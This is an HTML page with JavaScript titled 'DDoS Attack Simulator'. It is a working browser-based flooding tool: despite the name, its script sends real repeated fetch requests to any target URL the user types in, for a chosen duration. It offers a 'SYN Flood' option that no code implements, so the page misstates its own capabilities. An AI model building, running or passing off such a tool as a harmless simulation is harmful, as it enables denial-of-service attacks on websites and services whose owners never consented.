<html>
<head>
    <title>DDoS Attack Simulator</title>
    <div class="absolute top-4 left-4">
        <a href="/home/xapose/Project/index.html" class="bg-blue-500 text-white px-4 py-2 rounded hover:bg-blue-700">Home</a>
    </div>

    <script src="https://cdn.tailwindcss.com"></script>
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css"></link>
    <link href="https://fonts.googleapis.com/css2?family=Roboto:wght@400;500;700&display=swap" rel="stylesheet">
    <style>
        body {
            font-family: 'Roboto', sans-serif;
        }
    </style>
</head>
<body class="bg-gray-100">
    <div class="container mx-auto py-10">
        <h1 class="text-4xl font-bold text-center mb-8 text-gray-800">DDoS Attack Simulator</h1>
        <div class="bg-white rounded-lg shadow-md p-8 max-w-lg mx-auto">
            <h3 class="text-2xl font-semibold mb-4 text-gray-700">Enter Target URL</h3>
            <input type="text" id="targetUrl" class="w-full border border-gray-300 rounded-lg p-3 mb-4 focus:outline-none focus:ring-2 focus:ring-blue-500" placeholder="Enter Target URL">
            
            <h3 class="text-2xl font-semibold mb-4 text-gray-700">Select Attack Type</h3>
            <select id="attackType" class="w-full border border-gray-300 rounded-lg p-3 mb-4 focus:outline-none focus:ring-2 focus:ring-blue-500">
                <option value="http-flood">HTTP Flood</option>
                <option value="syn-flood">SYN Flood</option>
            </select>
            
            <h3 class="text-2xl font-semibold mb-4 text-gray-700">Specify Duration (seconds)</h3>
            <input type="number" id="attackDuration" class="w-full border border-gray-300 rounded-lg p-3 mb-6 focus:outline-none focus:ring-2 focus:ring-blue-500" placeholder="Enter Duration in Seconds">
            
            <div class="flex justify-between mb-6">
                <button id="startAttack" class="bg-red-500 hover:bg-red-700 text-white font-semibold py-2 px-4 rounded flex items-center">
                    <i class="fas fa-play mr-2"></i> Start Attack
                </button>
                <button id="stopAttack" class="bg-blue-500 hover:bg-blue-700 text-white font-semibold py-2 px-4 rounded flex items-center ml-4" disabled>
                    <i class="fas fa-stop mr-2"></i> Stop Attack
                </button>
            </div>
            
            <div id="progressContainer" class="w-full bg-gray-200 rounded-full h-4 mb-6 hidden">
                <div id="progressBar" class="bg-blue-500 h-4 rounded-full" style="width: 0%"></div>
            </div>
            
            <div id="errorMessage" class="text-red-500 font-semibold hidden"></div>
        </div>
    </div>

    <script>
        const targetUrlInput = document.getElementById('targetUrl');
        const attackTypeSelect = document.getElementById('attackType');
        const attackDurationInput = document.getElementById('attackDuration');
        const startAttackButton = document.getElementById('startAttack');
        const stopAttackButton = document.getElementById('stopAttack');
        const progressBar = document.getElementById('progressBar');
        const progressContainer = document.getElementById('progressContainer');
        const errorMessage = document.getElementById('errorMessage');

        let attackInterval;
        let attackTimeout;
        let totalRequests = 0;
        let successfulRequests = 0;
        let failedRequests = 0;

        startAttackButton.addEventListener('click', startAttack);
        stopAttackButton.addEventListener('click', stopAttack);

        function startAttack() {
            const targetUrl = targetUrlInput.value;
            const attackType = attackTypeSelect.value;
            const attackDuration = parseInt(attackDurationInput.value);

            if (targetUrl === '') {
                showError('Please enter a target URL.');
                return;
            }

            if (isNaN(attackDuration) || attackDuration <= 0) {
                showError('Please enter a valid duration.');
                return;
            }

            errorMessage.classList.add('hidden');
            progressContainer.classList.remove('hidden');
            progressBar.style.width = '0%';

            totalRequests = 0;
            successfulRequests = 0;
            failedRequests = 0;

            attackInterval = setInterval(() => {
                fetch(targetUrl)
                    .then(response => {
                        successfulRequests++;
                    })
                    .catch(error => {
                        failedRequests++;
                    })
                    .finally(() => {
                        totalRequests++;
                        updateProgressBar(totalRequests, attackDuration * 10);
                    });
            }, 100); // Rate limiting to 10 requests per second

            attackTimeout = setTimeout(stopAttack, attackDuration * 1000);

            startAttackButton.disabled = true;
            stopAttackButton.disabled = false;
        }

        function stopAttack() {
            clearInterval(attackInterval);
            clearTimeout(attackTimeout);

            startAttackButton.disabled = false;
            stopAttackButton.disabled = true;
        }

        function updateProgressBar(current, total) {
            const percentage = (current / total) * 100;
            progressBar.style.width = `${percentage}%`;
        }

        function showError(message) {
            errorMessage.textContent = message;
            errorMessage.classList.remove('hidden');
        }
    </script>
</body>
</html>